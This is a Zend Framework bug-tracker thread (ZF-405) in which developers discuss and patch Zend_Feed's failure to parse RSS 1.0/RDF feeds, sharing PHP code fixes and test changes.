Sorry, please forget my last comment - I used an old version of ZF... shame on me... | http://framework.zend.com/issues/browse/ZF-405?focusedCommentId=22077&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel | CC-MAIN-2015-27 | refinedweb | 1,641 | 77.23 |
rx-reduxrx-redux
A reimplementation of redux using RxJS.
Why?Why?
Reactive by default, this makes difference.
FeaturesFeatures
- All of the redux APIs implemented.
- Additionally,
storeprovides 2 rx objects you can utilize:
dispatcher$is a Subject that you can pass actions in.
state$is an Observable, a stream of states.
- And one helper function
import { connectAction } from 'rx-redux';
- You can use
connectAction(action$, store)to stream actions to dispatcher.
What does it look like?What does it look like?
const action$ = ;const newCreateStore = createStore;const reducer = ;const store = ;// stream states to viewstorestate$;// stream actions to dispatcheraction$;
Best practice to make your app all the way reactiveBest practice to make your app all the way reactive
Don't do async in
Middleware, create
RxMiddleware instead.
This will ease the pain to build universal app. See universal example
RxMiddlewareRxMiddleware
Which wrap action stream.
Look like this
;{return {iftypeof action === 'function'return RxObservable;// Don't know how to handle this thing, pass to next rx-middlewarereturn RxObservable;};}
How to design
RxMiddleware
- Get action, return Observable.
- Must return Observable.
- If you don't want to return a action (eg. if counter is not odd), return a
dummy action.
WIPWIP
- Figure out how to test a Rx project (No experience before).
- Work with Hot Module Replacement.
- Work with redux-devtools.
- More examples. | https://www.npmjs.com/package/rx-redux | CC-MAIN-2021-17 | refinedweb | 218 | 51.65 |
Functional Programming in Ruby
In Ruby, iteration is done mainly functionally with methods like each and map. We call this type of iteration functional because we are passing a function to be called on each item in the collection.In Ruby, iteration is done mainly functionally with methods like each and map. We call this type of iteration functional because we are passing a function to be called on each item in the collection.
[1,2,3].each { |item| puts item + 1 }
In this example. the function being passed is
{ |item| puts item + 1 }. In fact!
print_function = lambda { |item| puts item + 1 }
[1,2,3].each &print_function
Accomplishes the exact same behavior.
This is very much from the functional programing paradigm. Now, one thing that I can not stand to see in Ruby code is this.
def convert(old)
new = Array.new
old.each do |item|
new << transform(item)
end
new
end
The first hint that there is something wrong is the very odd call to return the
newvariable at the end of the
convertmethod. It seems odd and awkward, and that is a hint that you are working against the grain. Here is how it should look.
def convert(old)
old.map { |item| transform(item) }
end
Or alternatively:
def convert(old)
old.map &method(:transform)
end
Notice how clean and beautiful this is. We are working with the grain of functional programming here. Not only that, but there is less to debug, less to maintain and it takes less time to grok what is going on.
If you want to learn more about the functional programming roots of Ruby, I recommend learning OCaml, I am really enjoying it.
You should follow me on twitter here.
Technoblog reader special: click here to get $10 off web hosting by FatCow!
22 Comments:
Although, some of this only works with Symbol#to_proc of course!
11:57 PM, November 08, 2006
Thanks, Lucas - though I've read and coded this sort of thing before, having some of these things spelled out from different perspectives is nice for those of us learning Ruby.
I understand passing a proc to old.map, but I don't get how &method(:transform) works. I'm assuming 'transform' is a custom method defined in the class. Does that mean that &method will call the 'transform' method, automatically passing each element in 'old' to it and returning the value? Is there any advantage of using that over { |item| transform(item) } ?
11:58 AM, November 09, 2006
A real functional language is even better:
convert = map transform
(Haskell)
12:28 PM, November 10, 2006
A real functional language is even better:
convert = map transform
(Haskell)
Damn straight!
2:56 PM, November 10, 2006
As an aside, what OCaml book(s) do you recommend? I almost bought the Practical Ocaml book that just came out, but I'm seeing lots of bad reviews of that book.
Also, how about a PDX OCaml meetup?
3:19 PM, November 10, 2006
Thanks, Lucas, I found some neat stuff in libxml-ruby connected to this while implementing your more idiomatic way of expression in some code I had inherited.
Here is the blog post about it.
8:08 AM, November 12,:11 PM, November 30,:12 PM, November 30, 2006
i buy hydrocodone at buy hydrocodone - can't find any cheaper
7:02 AM, January 28, 2007
Why don't you use collect!?
8:58 AM, April 03, 2007
CarlH said...
Why don't you use collect!?
collect and map are synonyms, and can be used interchangably.
5:01 AM, July 03, 2007
i downloaded ruby, and i want to learn to program and everyone says its the easiest language to learn and ive read alot of tutorials on how to program for beginners but i still have literally no idea where to start... will someone please help me understand
4:36 PM, December 26, 2007
Hello!
My pick for the easiest language to learn would be definitely Python. I recommend you start with that. It is simple and clean, yet powerful. Ruby is really nice but Python is way more straightforward for a beginner, and is well documented.
3:00 AM, January 17, 2008
Instead of Practical OCaml, check out The Functional Approach to Programming by Cousineau and Mauny. Admittedly it uses Caml Light instead of OCaml, but the differences are very small (except that it doesn't cover OOP). It's gotten good revies and covers nicely the main points of FP.
There's also OCaml for Scientist by Harrop which I haven't read, plus a French O'Reilly book that's been translated into English.
12:37 PM, June 05, 2008:42
cleveland cavaliers jerseys
canada goose
rolex watches outlet
nike factory outlet
ralph lauren uk
basketball shoes
tory burch outlet
polo ralph kids
coach factory outlet
ralph lauren polo
michael kors outlet clearance
coach factory online
uggs on sale
christian louboutin pas cher
nike air max 90
ray ban sunglasses outlet
true religion sale
toms shoes
authentic louis vuitton handbags
coach factory outlet online
washington wizards jerseys
ugg boots
michael kors purses
jordan 11
ugg boots
uggs outlet
kate spade outlet
gucci handbags
cartier watches
chenyingying20160908
7:14 PM, September 07, 2016
adidas yeezy 350
ugg boots
adidas trainers
mbt shoes
cheap jordan shoes
gucci outlet
louis vuitton
washington wizards jerseys
ugg australia
coach factory outlet
chenlina20161018
7:49 PM, October 17, 2016
coach outlet online
michael kors outlet clearance
rolex watches for sale
moncler coats
cheap oakley sunglasses
coach outlet store online clearances
canada goose sale
chanel bags
louis vuitton outlet
tiffany and co jewelry
2017.1.4xukaimin
10:29 PM, January 03, 2017
michael kors bags
christian louboutin outlet
ralph lauren sale
ray ban sale
coach factory outlet online
yeezy boost 350
coach outlet online
moncler jackets
parada bags
cheap jerseys
xushengda0418
6:49 AM, April 18, 2017 | http://tech.rufy.com/2006/11/functional-programming-in-ruby.html | CC-MAIN-2017-22 | refinedweb | 981 | 61.56 |
We Frankenstein’ed our monolithic project’s legacy code with React and maybe you should too
My team is responsible for one of the oldest codebases still in active use in our company. I mean, it’s not like we’re gathering in a circle of old candles, chanting ancient songs and reciting the laments of past programmers from dusty tomes but as you might know, software projects that reach a certain age can grow a lot and get harder to maintain.
Dealing with the monolithic codebase of a project, which you know will continue to be used and built upon, can be tricky at times. There are important decisions and compromises to make. I will provide you with a few easy-to-follow steps that might help you regain control and make both management and customer happy.
To give you a rough idea of what we work with, my company is — among other projects — responsible for the development and maintenance of the Product Information/Content Management System (PIM/CMS) for a large German manufacturer in the automotive industry. Nearly all information about the vehicles that you can see on the manufacturer’s website, as well as data used by car dealers, car rental companies, used cars and even their online car configurator, can be created or modified via our PIM in line with market and language requirements.
When I took on my current position as senior frontend architect, I sat silently during our first code browsing sessions, spent hours navigating through the folder structures and when we did pair programming, I swallowed some of the remarks that came to mind when being completely outright would have made me look like an oh-so-wise (or pretentious) jerk.
Lesson 0 | Don’t judge!
If you are new to a project, take your time to understand the team, the history of the project and the environment that led to the current situation.
When the project was started roughly 10 years ago, most of the code was written in clean vanilla JavaScript against a Java/Spring Boot/Maven backend. For some additional functionality, selected jQuery plugins had been employed. At some point, AngularJS had been introduced to the project and new pages and features were written with this framework. As time went by, more and more features and modules had been stacked on top, and the PIM grew with each challenge, so that when Google did the big rewrite from AngularJS to Angular 2, it had become too expensive to migrate the code to the new framework.
Previously simple classes were extended again and again with each feature request, and even though the team had relied on proven best practices of object-oriented programming in many places, the sheer number of feature requests and limited time budgets had led to some very peculiar solutions.
Projects of this size can’t be rewritten on a whim and the daily business often doesn’t leave you enough room to do regular cleaning and refactoring runs. I was fully aware that I was in for a rough ride when I took on this job. Before signing my contract, I spoke to my future project manager, the team and the leads of other teams in the company to make sure that both knowledge and motivation to change things for the better would be available.
Lesson 1 | Talk with people
Try to get a good idea of what people are willing to do, what they are capable of, and what constraints might affect the things you are planning to do.
After spending enough time with the code and team, I started making plans. We had enough knowledge of React and Redux in our ranks to take these libraries into consideration and neither of those would severely lock us in when searching for new hires. As the learning curves for both aren’t very steep, it would allow us to keep training budgets for fresh developers manageable.
If your company has preexisting knowledge of other libraries or frameworks such as Angular (current versions) or Vue, React is not the only viable choice but it was our choice.
After getting some time free from my daily tasks, I built two small prototypes of React/Redux modules and implemented them in our old code. The first was the base for a globally present info-center, an information hub the user can slide in from the sidebar to check error and notification messages. The other one was a mock that I placed in one of the many larger .jsp pages to check if both modules would work and could use the same Redux store without causing problems with the existing jQuery and AngularJS code.
Lesson 2 | Make a Prototype ASAP
Don’t just assume and plan, test early! If you think something should work, make a minimal use case prototype and see if your assumptions are correct before proceeding to make plans and calculate budgets.
With those prototypes, some facts about the libraries in question and a rough idea in mind how to proceed, I went to my project lead and explained the plan I had formulated in my mind. We would continue to maintain the old code to the best of our abilities while new features would be written in React where feasible and reasonable. With every larger feature request from the customer, we would communicate the need to make adjustments to the old code, explain why the requested changes would take longer to build than usual and start rewriting old AngularJS features in clean and reusable React code.
Lesson 3 | Come prepared and with a business plan
When you wish to make larger changes to a project, prepare yourself for the discussion with those making the final calls. Do your homework, know what you are talking about and first & foremost, try to find a solution that can be sold to the customer. This usually makes the management happy.
The term we used when we started this project was Strangular. I tried and failed to find the old article (citation needed) that had coined this term for us. Our new and shiny React code would strangle the old AngularJS code and replace it piece by piece until nothing is left. When looking at our project today, I lovingly call it a Frankenstein’s Project. There are bits and pieces of old code and new code side by side and both are running well independently without causing any problems. All it took was one strike of lightning (our initial decision to make this step) and so far neither the team nor the customer came running with torches and pitchforks to my workplace.
[ cue evil laughter ]
These are the steps we took to make this work and keep it scalable.
Separation
Built as a Java/Spring Boot/Maven project, our code is divided into multiple Java modules containing the backend code, as well as a “web-module” with our old frontend code.
We wanted to keep the new code separated as cleanly as possible for a number of reasons. We decided to use webpack as our bundler, have almost all of the new code covered with tests, and run the code against a mock API on the webpack dev server without building and running the Java code on our Tomcat server.
With the help of a backend colleague, we created a new Maven frontend-module that is now tied into our project’s build process and takes care of installing node/npm, bundling our assets and handing them as a webjar to the old web-module. This way there were no additional changes needed to our deployment workflow.
Bridging two worlds
As our project is still mainly AngularJS code living in .jsp files and we needed to be able to initialise React components and modules in many different places in our old code, we had to build a bridge between both worlds.
Every “new world” feature/module we are building is registered with our reactBridge which is available in the scope of the “old world”.
// src/utils/reactBridge.js
import renderInfoCenter from '../components/modules/info-center'
import renderModuleA from '../components/modules/moduleA'
import renderModuleB from '../components/modules/moduleB'

const reactBridge = {
renderInfoCenter,
renderModuleA,
renderModuleB,
}
export default reactBridge
In our old code, we included our reactBridge.js file and built an angular factory for our Services module to make the window.reactBridge available.
// services/reactBridge.js
angular.module('Services').factory('reactBridge', function () {
'use strict';
return window.reactBridge;
});
If we now needed to initialise or render a React module, we could simply place a hook in the code like
<div id="infocenter" /> and call the render function where needed.
// angular-base-layout.jsp
<script src="${BASE}/webjars/frontend/vendor.js"></script>
<script src="${BASE}/webjars/frontend/base.js"></script>

[...]

<script>
window.reactBridge.renderInfoCenter()
</script>
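What one of those render functions does internally is not shown above. As a rough sketch, a bridge entry might guard against being called twice before handing off to ReactDOM; the guard logic and names below are assumptions, not the project's actual code.

```javascript
// Hypothetical sketch of one bridge entry. The mount-guard is the point
// here; the real ReactDOM call (commented out) would go where indicated.
const mounted = new Set();

function renderInfoCenter(targetId = 'infocenter') {
  if (mounted.has(targetId)) {
    return false; // old-world code may call this more than once
  }
  // ReactDOM.render(<InfoCenter store={store} />,
  //                 document.getElementById(targetId))
  mounted.add(targetId);
  return true;
}

console.log(renderInfoCenter()); // → true
console.log(renderInfoCenter()); // → false (second call is a no-op)
```

A guard like this matters because the .jsp pages are assembled from fragments, and it is easy for two fragments to trigger the same render hook.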
For making Redux dispatches available to old code, this was a bit more complicated but still manageable. We import our store and all dispatchable actions that need to be exposed to the old code for shared functionality and add them to the reduxBridge.
import store from '../redux/store'
import { addNotifications } from '../redux/actions/notifications.actions'
import { dispatchActionForModuleA } from '../redux/actions/moduleA.actions'
const bridgeDispatch = (func, payload) => store.dispatch(func(payload))
const reduxBridge = {
addNotifications: payload => bridgeDispatch(
addNotifications,
payload
),
dispatchActionForModuleA: payload => bridgeDispatch(
dispatchActionForModuleA,
payload
),
onStateChanged: (callback) => {
store.subscribe(() => {
const state = store.getState()
callback(state)
})
},
}
export default reduxBridge
Again, the Angular module:
// services/reduxBridge.js
angular.module('Services').factory('reduxBridge', function () {
'use strict';
return window.reduxBridge;
});
If we were to dispatch an addNotifications action for the info-center, for example, we could easily do this in the successAction of our API call.
// somewhere in our code...
showInfo : function(message) {
var data = getMessageData(message, 'info');
typeof reduxBridge === 'object'
? reduxBridge.addNotifications([data])
: console.log("reduxBridge not available after timeout")
},
Decide for each Feature Request individually
If I had all the time in the world, I would completely rewrite the old project, bit by bit for every request that the customer makes. In an ideal world, that might be possible. In reality, though, you have to make some tough calls and keep your customer in mind, not only your developers. Finding a healthy balance is key here.
There will be cases when either the deadline demands quick actions or the remaining budget for the quarter is nearly depleted. In those cases, it might be the better choice to keep your internal idealist in check and do what’s best in the short run.
Lesson 4 | Choose your battles wisely!
Find a balance between refactoring, rewrites and adjustments in regards to budget and time and depending on the requirements. In the long run, new and well written code will benefit both customer and the team managing the code but in some cases you just have to get shit done quick. Make wise decisions for the better of the project.
What did we gain?
With all the changes we made and our new React/Redux frontend-module, we’ve made a lot of improvements both for us and the customer. Here’s a short and not exhaustive list:
- Webpack Bundling with tree shaking
- Webpack Dev Server for better FE code development
- modular and reusable react components
- more velocity with every completed feature
- new code is easier to test and reason about
- mock data / API for development independently from BE team
- Redux store as a single point of truth instead of old AngularJS scope
- Redux middleware as an abstraction layer between frontend code and API
- no need for a complete relaunch
- reduction of technical debt
- we can pick and attack the most relevant parts of the code when and where we want
- even more motivated team members than before
What did we lose?
We spent some time on our internal budget to develop a prototype before addressing the customer and starting to solve feature requests with the new setup.
In some cases, we still mainly maintain and extend the old code even though rewriting it would be so much more fun.
This journey was not without its perils. Making huge changes like this to the way you work in a company is likely to create some friction. You need to clearly communicate your estimates when planning new features. You need to include the customer in this decision process if it means that things will take a bit longer while getting started. You need to create a shared understanding with both your management and the customer why building up technical debt will cost a lot more money in the long run.
In the end, I can wholeheartedly say that I never — not even in the slightest — regretted our decision. Happy developers work faster. Clean code is easier to maintain. Clean code makes for happy developers.
Some words about me:
If you want to read more of my articles, feel free to check out my author page:
- Building games with React Native [Series]
- Spread & Rest Syntax in Javascript
- clean and simple Redux, explained
- Game Theory behind Incremental Games [Series]
- Custom and flexible UI Frames in React Native
- React Native Web App with Hooks, Bells, and Whistles [Series] | https://allbitsequal.medium.com/we-frankensteined-our-monolithic-project-s-legacy-code-with-react-and-maybe-you-should-too-8cd807bac597 | CC-MAIN-2022-27 | refinedweb | 2,189 | 57.81 |
MySQL is a popular free database which many (including me) prefer for writing database applications. Being relatively new to WPF, I wanted to see how MySQL could be used in a WPF application. This proved to be a fairly long journey, so we’ll probably need several posts to get through it all.
First, if you’re new to MySQL, you’ll need to download and install it. I won’t go into great detail here, apart from pointing you in the direction of the main download page for the free version (there are commercial versions that cost real money as well). After installing MySQL itself, you’ll need to install the MySQL ADO.NET connector in order to use it in WPF programming. This is currently located here, but if in the future this link is dead, just do a search for MySQL and ADO.NET.
With these two packages installed you should be ready to start writing code in Visual Studio (VS). The program I’ll discuss is a front end to an existing database, which allows you to insert, modify and delete records in the database. In homage to Sheldon Cooper, the database will contain details of my comic book collection. I’ll assume that you understand the basics of database construction, including the creation of tables and insertion of records into these tables. I’ll also assume you know the rudiments of SQL, since I’ll be using it to construct a few commands to be sent to the database. If you don’t know SQL very well (or at all) it shouldn’t hamper you too much since you can probably figure out what the commands are doing (SQL is fairly transparent at this level).
First, we’ll need to consider the structure of the database itself. It contains three tables, which contain the following fields:
Publishers (publishers of comic books)
- Key_Publishers (the primary key)
- Name (the name of the publisher)
Titles (titles of comic book series, not of individual issues)
- Key_Titles (the primary key)
- Title (the title’s name, such as Action Comics)
- Publisher (an int giving the key of the publisher of this title)
Issues (individual issues of given titles)
- Key_Issues (the primary key)
- IssueTitle (the title of the individual issue)
- Title (an int linking to the key in the Titles table)
- Volume
- Number
- IssueDay
- IssueMonth
- IssueYear
- ComicVine (the URL of the page on ComicVine giving details about this issue)
The UI of the program consists of a tab control with three tabs: one for editing the issues, one for the titles and one for the publishers. We’ll consider the issues one first. It looks like this:
At the top is a ComboBox from which we can choose the title. Beneath this is a DataGrid in which we display the individual records from the data base for that title. At the bottom are a few boxes in which individual data for the selected issue are displayed. The user can edit the information either directly in the DataGrid, or by editing the boxes at the bottom. The info in the boxes is identical to that displayed in the DataGrid except for the ComicVine link, which is shown as a URL in the text box, but as a hyperlink with the label ‘ComicVine’ in the DataGrid. This is done because the URL is usually far too long to be displayed conveniently in the grid, as you can see. The ‘Add’ button allows the user to add a new issue.
Clearly there’s a lot going on here, so we’ll need to take things step by step. To begin, let’s see how we can get the ComboBox to display the list of titles. (I’ll assume you can create the basic UI using Expression Blend (EB) or VS so I won’t go into that here.)
First, we need to let our VS project know we’ll be using MySQL. If you’ve installed the connecter mentioned above, you still need to include MySQL as a reference in your VS project. To do this, right-click on References in Solution Explorer and then click on the .NET tab. You may need to wait a few seconds while this list finishes loading, but eventually you can find MySQL.Data in the list, so you should add that. Now we can start writing some code.
Most of the linkage between controls and the MySQL database is done via data binding, which we’ve already looked at for simpler cases (see the index for a list of pages). Before we dive into the code it’s essential that you understand the structure of the program.
Ultimately the data are stored in the MySQL database, but the program itself doesn’t use this for the displays. First, the data must be loaded from the MySQL database into an internal data structure, which is then used for the main working of the program. Changes made by the user to the data using the UI affect only this internal representation of the data. If we want these changes to be made permanent, we need to write the code that will save these changes back to the original MySQL database.
WPF provides several internal data structures useful for storing information from a database. In fact, VS provides an automated way of creating a DataSet from database servers it has access to. Although you can create a DataSet from a MySQL server, the associated functionality provided by VS doesn’t seem to work with MySQL (at least I couldn’t find any way of making it work – there may be something that I haven’t discovered), so we need to write our own code to handle changes to the MySQL database. This isn’t that hard to do as we’ll see, but we’re getting ahead of ourselves.
Let’s see how we can access the data required to populate the ComboBox containing the list of Titles. From the above structure of the database, we see that the information is stored in the Titles table, so we need to load that data into the program. We’ve provided a separate class that handles this, and here’s the relevant code:
using System;
using System.Collections.Generic;
using System.Data;
using System.Linq;
using System.Text;
using MySql.Data.MySqlClient;

//.....

class DatabaseTable
{
    MySqlConnection connection;
    MySqlDataAdapter adapter;

    public DataTable GetTable(String query, String sortBy)
    {
        String connString = "server=localhost;uid=root;pwd=xxxx;database=comics;";
        connection = new MySqlConnection(connString);
        adapter = new MySqlDataAdapter(query, connection);
        DataTable dataTable = new DataTable();
        adapter.Fill(dataTable);
        dataTable.DefaultView.Sort = sortBy;
        return dataTable;
    }
}
Note the ‘using’ statement that specifies the MySql library.
To get at data in a MySQL database we first need to connect to it, and that’s what the MySqlConnection is for. Its constructor requires a string giving the information needed to connect. In this case, we specify the server as ‘localhost’ which means it’s on the local machine. If you’re connecting to a remote server, you’d give the URL instead. The userID (uid) and password (pwd) are then given, followed by the name of the database.
Next, we need to create a MySqlDataAdapter, which is what does the actual work of retrieving the information from the database and storing it in the local object. In order for the adapter to get some data, it needs to know what to look for, and that’s what the ‘query’ string is for. This is an SQL command, which we’ll get to in a minute.
The adapter has to be given an object in which to store the data it retrieves. The standard data structure is the DataTable (in System.Data), which is essentially a single table of data. The Fill() method of MySqlDataAdapter executes the query on the MySQL database and loads the result in the DataTable. The DataTable will have columns with the same names as those in the original database, and it is these column names that can be used in data binding later on.
The last thing we do is define a sorting condition. Remember that whenever we bind a control to a data source such as a list, a collection view is automatically created and inserted between the data source and the control. This also applies to data binding between a control such as a ComboBox and a DataTable. The ComboBox displays the data as given by the collection view, so if we wish to sort the data as displayed in the UI, we add a sort command to the view. The data in the original DataTable is unchanged; all that changes is the way that data appears on screen.
In the case of a DataTable, we access its DefaultView as shown in the code, and then attach a Sort command to the view. The Sort is simply a string giving the sorting command we want. If we wish to sort the list of Titles, for example, we would specify ‘sortBy’ as “Title”, which is the name of the column we want to use as the sort key. (More complex sorting can be done too. We’ll see this when we consider the DataGrid showing the issues.)
There’s an important point here. Those of you familiar with SQL will know that we can include a sorting command as part of an SQL query, so you might be wondering why we didn’t just include the sorting command as part of the ‘query’ we sent to the database. The reason is that doing it this way would ask the MySQL database to do the sorting, so that the data used to populate the DataTable would be correctly sorted when it first arrives. However, if we then add extra rows to the DataTable by using our program, these rows would merely be tacked onto the end of the DataTable and would not be correctly sorted, since the DataTable hasn’t been told to sort its data. By putting the sort command into the DataTable rather that in the original SQL command, we ensure that the data as displayed in the program are always correctly sorted.
OK, we now have our internal DataTable, so how do we use this to populate the ComboBox? Fortunately, we’ve already considered data binding with a ComboBox, so we can model our code along that example. We’ll do things a little differently here, however, to illustrate a common technique for providing data sources in data binding.
We saw above that we provided the code for getting the DataTable in a class called DatabaseTable. We can access the DataTable by declaring an ObjectDataProvider in the XAML part of the code. In the Window.Resources section of the XAML, we can write:
<Window xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:local="clr-namespace:Comics"
        xmlns:s="clr-namespace:System;assembly=mscorlib">
  <Window.Resources>
    <ObjectDataProvider x:Key="TitlesTable"
                        ObjectType="{x:Type local:DatabaseTable}"
                        MethodName="GetTable">
      <ObjectDataProvider.MethodParameters>
        <s:String>SELECT * FROM titles</s:String>
        <s:String>Title</s:String>
      </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
  </Window.Resources>
  <!-- Code for UI -->
</Window>
This creates a resource with the name given as the Key (TitlesTable) by creating an object of the given type (DatabaseTable) and calling the indicated method (GetTable). The parameters passed to the method are given next, and in this case are two strings. The first string is the query to be sent to the MySQL database, and the second string is the Sort command, so that the DataTable sorts the records by Title.
Note that you’ll need to ensure that the various prefixes used in this XAML code are defined. Typically most of them are defined for you when you create a project in VS, but there are a couple that you’ll probably need to define yourself. Here, the ‘local’ namespace is the namespace used for the code in the project (Comics here). The ‘s’ namespace is required to define the String data type. (This is one reason why I hate XAML: although it is more compact in some cases, there is so much finicky stuff that it can be hard to get it right.)
We’re almost there. The last thing we’ll look at in this post is how to define the ComboBox so it gets its data from the ObjectDataProvider we just defined. The relevant line is:
<ComboBox x:Name="..."
          ItemsSource="{Binding Source={StaticResource TitlesTable}}"
          DisplayMemberPath="Title"
          SelectedValuePath="Key_Titles"
          SelectionChanged="..." />
There’s a bit of stuff in here that we’ll get to later, but the relevant bits are:
- ItemsSource is bound to the StaticResource TitlesTable that we just defined. This means that the items displayed in the ComboBox are bound to the items in that DataTable.
- DisplayMemberPath is specified as ‘Title’. Since the DataTable contains more than one (two, actually) columns, we need to tell the ComboBox which column to display. The ‘Title’ is the textual title which the user can read.
- SelectedValuePath: internally, we use the Key_Titles column for connecting a title with an issue (as we saw in the database tables above), so when the user selects an item from the ComboBox, we need to know the Key_Titles value in order to be able to retrieve the issues for that Title. More on this later when see how to populate the DataGrid.
- SelectionChanged: when the user selects an item in the ComboBox, we need to update the display in the DataGrid to display all issues with that Title, so we provide an event handler to do this. Again, we’ll see how this works in a later post.
The program at this stage should display the list of titles in the ComboBox, although selecting an item won’t do anything yet. But that’s enough for one post, so we’ll continue the story in the next post. | https://programming-pages.com/tag/combobox/ | CC-MAIN-2018-26 | refinedweb | 2,270 | 68.5 |
There have now been a number of different PCB revisions which have made small changes to the design of the Raspberry Pi PCB. In the latest revision some of these changes may affect the operation of Python code developed for earlier versions. In order to make you script react to these changes you may need to identify the board revision so your script can take appropriate action.
The following Python function “getrevision()” can be used to return a string containing the hardware revision number. This is a four character string such as “0002”.
Here is the Python function :
def getrevision():
  # Extract board revision from cpuinfo file
  myrevision = "0000"
  try:
    f = open('/proc/cpuinfo','r')
    for line in f:
      if line[0:8]=='Revision':
        length=len(line)
        myrevision = line[11:length-1]
    f.close()
  except:
    myrevision = "0000"
  return myrevision
If you include this definition at the beginning of your Python script you can use it to set a variable equal to the board revision number :
myrevision = getrevision()
If this variable is equal to “0000” then there was an error while running the function.
Raspberry Pis that have been overvolted will have a code prefixed with “100”. If I overvolted my device I would end up with a hardware revision code of “1000002”.
At the time of writing your board revision number could be “0002”, “0003”, “0004”, “0005” or “0006”. You can use the Checking Your Raspberry Pi Board Version post to double check the results of this Python function.
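If you need to compare boards regardless of overvolting, you could strip the "100" prefix first. The helper below is a sketch built on the prefix rule described above; it is not part of the original snippet.

```python
# Hypothetical helper: normalise a revision code by stripping the "100"
# overvolt prefix so "1000002" and "0002" identify the same board revision.
def normalise_revision(code):
    if len(code) > 4 and code.startswith('100'):
        code = code[3:]
    return code.zfill(4)

print(normalise_revision('1000002'))  # → 0002
print(normalise_revision('0003'))     # → 0003
```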
Just a nitpick, but
length=len(line)
myrevision = line[11:length-1]
could be replaced by the shorter and simpler:
myrevision = line[11:-1]
Or, the whole function could be replaced by the even shorter but not simpler:
def getrevision():
return ([l[11:-1] for l in open('/proc/cpuinfo','r').readlines() if l[:8]=="Revision"]+['0000'])[0]
JOOSTETO, are you trying to save on code lines?
It's better to be human readable.
Details
Description
It would be nice to set a default access to a table so adding a new user does not require adding all the permissions for each table they will read.
Issue Links
- duplicates
ACCUMULO-1479 Create per-user permissions for a given table namespace
- Resolved
- relates to
ACCUMULO-802 table namespaces
- Resolved
Activity
I would like to promote this ticket and perhaps slightly modify it. I have a user that has permissions to create tables. However, when that user creates a new table, I would like the user to be able to read, write, alter, bulk_import, and grant for that new table. I do not want to give the user global permissions as such, only for new tables the user creates. Otherwise I have to manually give the user those permissions for the new table every time a new table is created.
That should be the default behavior? Is this not the case and/or did it change in 1.5?
It does not appear to be the case in 1.4.3+. I have a user creating a table and subsequently getting errors somewhere down in a doesTableExist method which disappear once I specifically grant permissions on the new table. I will try to include more specifics when I get back to work later this month.
I just tested this on 1.4.2 release, 1.4.3 SNAPSHOT, and 1.5.0 SNAPSHOT, and I'm not seeing any changes in this behavior. A user was created, given create table, switched to that user, and then created a table and they had all TABLE permissions for the newly created table.
Furthermore, this ticket was about adding a new feature to Accumulo regarding Table permissions, which wouldn't have had any diminishing effect in this behavior. All it would have done would have allowed a marking on tables such that newly created users would automatically have a set of TABLE permissions for it.
If a user has CREATE_TABLE, they are granted Table.READ, Table.WRITE, Table.BULK_IMPORT, Table.ALTER_TABLE, Table.GRANT, Table.DROP_TABLE to the tables they create.
This ticket wasn't a bug, it was a feature request to add a table level access. So you could create a table and give it a global read/write/modify/etc. so any users created after the table could be given automatic access to it.
Will ACCUMULO-1479 satisfy this ticket? Can I close this as a duplicate?
To clarify, for my own purposes: we want to have a set of table permissions that all users get, regardless of their own access. That is, a user's access for each permission is going to be the union of their own permissions and the table default permission.
Building, Running, and the REPL
In this chapter, you’ll invest a small amount of time up front to get familiar with a quick, foolproof way to build and run Clojure programs. It feels great to get a real program running. Reaching that milestone frees you up to experiment, share your work, and gloat to your colleagues who are still using last decade’s languages. This will help keep you motivated!
You’ll also learn how to instantly run code within a running Clojure process using a Read-Eval-Print Loop (REPL), which allows you to quickly test your understanding of the language and learn more efficiently.
But first, I’ll briefly introduce Clojure. Next, I’ll cover Leiningen, the de facto standard build tool for Clojure. By the end of the chapter, you’ll know how to do the following:
- Create a new Clojure project with Leiningen
- Build the project to create an executable JAR file
- Execute the JAR file
- Execute code in a Clojure REPL
First Things First: What Is Clojure?
Clojure was forged in a mythic volcano by Rich Hickey. Using an alloy of Lisp, functional programming, and a lock of his own epic hair, he crafted a language that’s delightful yet powerful.
When talking about Clojure, though, it’s important to keep in mind the distinction between the Clojure language and the Clojure compiler. The Clojure language is a Lisp dialect with a functional emphasis whose syntax and semantics are independent of any implementation. The compiler is an executable JAR file, clojure.jar, which takes code written in the Clojure language and compiles it to Java Virtual Machine ( JVM) bytecode. You’ll see Clojure used to refer to both the language and the compiler, which can be confusing if you’re not aware that they’re separate things. But now that you’re aware, you’ll be fine.
This distinction is necessary because, unlike most programming languages like Ruby, Python, C, and a bazillion others, Clojure is a hosted language. Clojure programs are executed within a JVM and rely on the JVM for core features like threading and garbage collection. Clojure also targets JavaScript and the Microsoft Common Language Runtime (CLR), but this book only focuses on the JVM implementation.
We’ll explore the relationship between Clojure and the JVM more later on, but for now the main concepts you need to understand are these:
- JVM processes execute Java bytecode.
- Usually, the Java Compiler produces Java bytecode from Java source code.
- JAR files are collections of Java bytecode.
- Java programs are usually distributed as JAR files.
- The Java program clojure.jar reads Clojure source code and produces Java bytecode.
- That Java bytecode is then executed by the same JVM process already running clojure.jar.
Clojure continues to evolve.
Now that you know what Clojure is, let’s actually build a freakin’ Clojure program!
Leiningen
These days, most Clojurists use Leiningen to build and manage their projects. You can read a full description of Leiningen in Appendix A, but for now we’ll focus on using it for four tasks:
- Creating a new Clojure project
- Running the Clojure project
- Building the Clojure project
- Using the REPL
Before continuing, make sure you have Java version 1.6 or later installed. You can check your version by running java -version in your terminal, and download the latest Java Runtime Environment (JRE) from. Then, install Leiningen using the instructions on the Leiningen home page at (Windows users, note there’s a Windows installer). When you install Leiningen, it automatically downloads the Clojure compiler, clojure.jar.
Creating a New Clojure Project
Creating a new Clojure project is very simple. A single Leiningen command creates a project skeleton. Later, you’ll learn how to do tasks like incorporate Clojure libraries, but for now, these instructions will enable you to execute the code you write.
Go ahead and create your first Clojure project by typing the following in your terminal:
This command should create a directory structure that looks similar to this (it’s okay if there are some differences):
| .gitignore
| doc
| | intro.md
➊ | project.clj
| README.md
➋ | resources
| src
| | clojure_noob
➌ | | | core.clj
➍ | test
| | clojure_noob
| | | core_test.clj
